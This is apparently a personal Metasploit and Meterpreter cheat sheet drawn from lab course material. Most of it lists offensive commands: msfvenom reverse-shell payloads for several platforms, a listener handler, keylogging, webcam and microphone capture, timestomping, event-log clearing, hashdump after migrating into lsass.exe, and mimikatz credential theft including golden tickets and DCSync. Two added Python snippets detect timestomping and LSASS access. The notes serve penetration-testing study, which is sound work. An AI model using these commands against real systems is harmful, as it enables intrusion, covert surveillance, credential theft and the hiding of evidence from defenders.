Metasploit and Meterpreter
Basic commands
show payloads // list all payloads
info // alternative to show options, gives more details about the module
search type:auxiliary telnet // limit the search to a particular module type
unset // revert an option to its default
setg // set an option globally for all current and future selected modules
exploit -z // background the session as soon as it opens
getpid // get the process ID Meterpreter is running in
Finding files in meterpreter
search -f flag*.txt (in meterpreter)
Payloads
List Payloads
msfvenom -l payloads
msfvenom --list formats // list output formats
msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 LHOST=<IP> LPORT=<PORT> -f exe > shell-x86.exe
Based on the target system's configuration (operating system, installed web server, installed interpreter, etc.), msfvenom can be used to create payloads in almost all formats. Below are a few examples you will often use:
In all these examples, LHOST will be the IP address of your attacking machine, and LPORT will be the port on which your handler will listen. The .elf format is comparable to the .exe format in Windows: these are executable files for Linux. However, you may still need to make sure they have executable permissions on the target machine. For example, once you have the shell.elf file on your target machine, use the chmod +x shell.elf command to grant executable permissions. Once done, you can run this file by typing ./shell.elf on the target machine command line.
Linux Executable and Linkable Format (elf)
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f elf > rev_shell.elf
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe
PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.php
ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f asp > rev_shell.asp
Python
msfvenom -p cmd/unix/reverse_python LHOST=10.10.X.X LPORT=XXXX -f raw > rev_shell.py
If msfconsole reports a database error, start the database service:
service postgresql start
Multi handler
use exploit/multi/handler
exploit -j -z // runs the handler as a background job
Useful commands meterpreter
sysinfo
getuid
ifconfig
pwd // print the current working directory (often the Downloads folder)
ls
cat
cd
keyscan_start // start the keylogger
keyscan_dump // dump captured keystrokes
idletime
To modify a file's MACE timestamps (Modified, Accessed, Created, Entry modified):
timestomp secret.ext -m "2/11/2022 8:10:03"
To view timestamp entries
timestomp secret.ext -v
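From the defender's side, the timestomp command above takes a date string with one-second resolution, so a stomped file usually ends up with timestamps whose sub-second part is exactly zero, which is unusual for files written by normal software. The following added example (not part of the original notes) flags that artifact plus timestamps set into the future; the sample stat values are constructed, and the function names are my own.

```python
"""Timestomp heuristics over file stat values (added example, not from the notes)."""
import os
from datetime import datetime, timezone

NS_PER_SEC = 1_000_000_000


def timestomp_indicators(mtime_ns, atime_ns, now_ns):
    """Return the reasons (if any) why a file's timestamps look tampered.

    Pure function over stat values so it can be tested without touching disk.
    Whole-second timestamps are only a lead, not proof: FAT and zip extraction
    also produce them, so confirm against the MFT $FILE_NAME times on NTFS.
    """
    reasons = []
    if mtime_ns % NS_PER_SEC == 0:
        reasons.append("mtime has zero sub-second component")
    if atime_ns % NS_PER_SEC == 0:
        reasons.append("atime has zero sub-second component")
    if mtime_ns > now_ns:
        reasons.append("mtime is in the future")
    return reasons


def scan_directory(root, now_ns=None):
    """Walk root and map each suspicious path to its list of reasons."""
    if now_ns is None:
        now_ns = int(datetime.now(timezone.utc).timestamp()) * NS_PER_SEC
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                st = os.stat(full, follow_symlinks=False)
            except OSError:
                continue  # unreadable entry, skip rather than abort the scan
            reasons = timestomp_indicators(st.st_mtime_ns, st.st_atime_ns, now_ns)
            if reasons:
                findings[full] = reasons
    return findings


def demo():
    """Constructed sample: secret.ext mimics timestomp -m "2/11/2022 8:10:03"."""
    now_ns = int(datetime(2024, 1, 1, tzinfo=timezone.utc).timestamp()) * NS_PER_SEC
    stomped = int(datetime(2022, 2, 11, 8, 10, 3, tzinfo=timezone.utc).timestamp()) * NS_PER_SEC
    normal = stomped + 123_456_789  # a write by ordinary software keeps sub-second bits
    return {
        "secret.ext": timestomp_indicators(stomped, stomped, now_ns),
        "report.docx": timestomp_indicators(normal, normal + 7, now_ns),
    }
```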
Hidden files in shell
First get the shell, then use the following command.
dir /a:h
List all running services in shell
sc queryex type= service state= all // note the space after each '=' (sc requires it)
Other shell commands
netsh firewall show state // firewall state
netsh firewall show config
wmic cpu get
wmic /node:"" product get name,version,vendor
wmic useraccount get name,sid
wmic os where Primary='TRUE' reboot //restarts system
Dumping hashes in meterpreter
hashdump // or try the following
use post/windows/gather/smart_hashdump

Metasploit Scanners
scanner/discovery/udp_sweep
auxiliary/scanner/http/http_version
Meterpreter commands
Core commands will be helpful to navigate and interact with the target system. Below are some of the most commonly used. Remember to check all available commands by running the help command once a Meterpreter session has started.
Core commands
background: Backgrounds the current session
exit: Terminates the Meterpreter session
guid: Gets the session GUID (Globally Unique Identifier)
help: Displays the help menu
info: Displays information about a Post module
irb: Opens an interactive Ruby shell on the current session
load: Loads one or more Meterpreter extensions
migrate: Allows you to migrate Meterpreter to another process
run: Executes a Meterpreter script or Post module
sessions: Quickly switch to another session
ps: Lists running processes
File system commands
cd: Changes directory
ls: Lists files in the current directory (dir will also work)
pwd: Prints the current working directory
edit: Allows you to edit a file
cat: Shows the contents of a file on the screen
rm: Deletes the specified file
search: Searches for files
upload: Uploads a file or directory
download: Downloads a file or directory
Networking commands
arp: Displays the host ARP (Address Resolution Protocol) cache
ifconfig: Displays network interfaces available on the target system
netstat: Displays the network connections
portfwd: Forwards a local port to a remote service
route: Allows you to view and modify the routing table
System commands
clearev: Clears the event logs
execute: Executes a command
getpid: Shows the current process identifier
getuid: Shows the user that Meterpreter is running as
kill: Terminates a process
pkill: Terminates processes by name
ps: Lists running processes
reboot: Reboots the remote computer
shell: Drops into a system command shell
shutdown: Shuts down the remote computer
sysinfo: Gets information about the remote system, such as the OS
Other commands (these will be listed under different menu categories in the help menu)
idletime: Returns the number of seconds the remote user has been idle
keyscan_dump: Dumps the keystroke buffer
keyscan_start: Starts capturing keystrokes
keyscan_stop: Stops capturing keystrokes
screenshare: Allows you to watch the remote user's desktop in real time
screenshot: Grabs a screenshot of the interactive desktop
record_mic: Records audio from the default microphone for X seconds
webcam_chat: Starts a video chat
webcam_list: Lists webcams
webcam_snap: Takes a snapshot from the specified webcam
webcam_stream: Plays a video stream from the specified webcam
getsystem: Attempts to elevate your privilege to that of local system
hashdump: Dumps the contents of the SAM database
Although all these commands may seem available under the help menu, they may not all work. For example, the target system might not have a webcam, or it can be running on a virtual machine without a proper desktop environment.
Meterpreter Modules
You can also use the load command to leverage additional tools such as Kiwi or even the whole Python language.
Loading Python
meterpreter > load python
Loading extension python...Success.
meterpreter > python_execute "print 'TryHackMe Rocks!'"
[+] Content written to stdout:
TryHackMe Rocks!
meterpreter >
The post-exploitation phase will have several goals; Meterpreter has functions that can assist all of them.
Gathering further information about the target system.
Looking for interesting files, user credentials, additional network interfaces, and generally interesting information on the target system.
Privilege escalation.
Lateral movement.
Once any additional tool is loaded using the load command, you will see new options on the help menu. The example below shows commands added for the Kiwi module (using the load kiwi command).
Loading Kiwi (mimikatz)
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
These will change according to the loaded module, so running the help command after loading a module is always a good idea. The updated help menu:
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
Gather domain info with a post-exploitation module
use post/windows/gather/enum_domain
set SESSION 1 // the option is SESSION (singular), the ID from the sessions list
run
Shares with metasploit
post/windows/gather/enum_shares

Dumping hashes
hashdump
If it does not work, migrate into a privileged process such as lsass.exe and then try the command again
ps
migrate 764
hashdump
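On the detection side, a migrate into lsass.exe followed by hashdump typically shows up in Sysmon as Event ID 8 (CreateRemoteThread) and Event ID 10 (ProcessAccess with a memory-read right) targeting lsass.exe. The added example below (not part of the original notes) runs that logic over constructed log lines in a simplified key=value form rather than Sysmon's real XML; the allowlist and function names are assumptions of my own.

```python
"""Flag lsass.exe access patterns in Sysmon-style events (added example)."""
import re

# PROCESS_VM_READ; needed to read credential material out of LSASS memory.
PROCESS_VM_READ = 0x0010
# Constructed allowlist of images that legitimately touch LSASS; tune per estate.
TRUSTED_ACCESSORS = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}

LINE_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line):
    """Turn 'Key=value Key2="quoted value"' into a dict (quotes stripped)."""
    return {k: v.strip('"') for k, v in LINE_RE.findall(line)}


def basename(image):
    return image.lower().rsplit("\\", 1)[-1]


def lsass_alerts(lines):
    """Return human-readable alerts for events that target lsass.exe."""
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if basename(ev.get("TargetImage", "")) != "lsass.exe":
            continue
        src = ev.get("SourceImage", "?")
        if ev.get("EventID") == "8":
            # Any remote thread into LSASS is worth an alert (migrate, injection).
            alerts.append(f"remote thread into lsass.exe from {src}")
        elif ev.get("EventID") == "10":
            granted = int(ev.get("GrantedAccess", "0"), 16)
            if granted & PROCESS_VM_READ and basename(src) not in TRUSTED_ACCESSORS:
                alerts.append(f"lsass.exe memory read (0x{granted:x}) from {src}")
    return alerts


# Constructed sample log: one benign query, then the migrate + hashdump pattern.
SAMPLE_LOG = [
    'EventID=10 SourceImage="C:\\Windows\\System32\\svchost.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess=0x1000',
    'EventID=8 SourceImage="C:\\Users\\bob\\Downloads\\rev_shell.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" StartAddress=0x7FF6A0001000',
    'EventID=10 SourceImage="C:\\Users\\bob\\Downloads\\rev_shell.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess=0x1fffff',
    'EventID=10 SourceImage="C:\\ProgramData\\MsMpEng.exe" '
    'TargetImage="C:\\Windows\\System32\\lsass.exe" GrantedAccess=0x1fffff',
]
```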
Revert to original user
If you have moved to another user context, you can revert to the original user with the following:
rev2self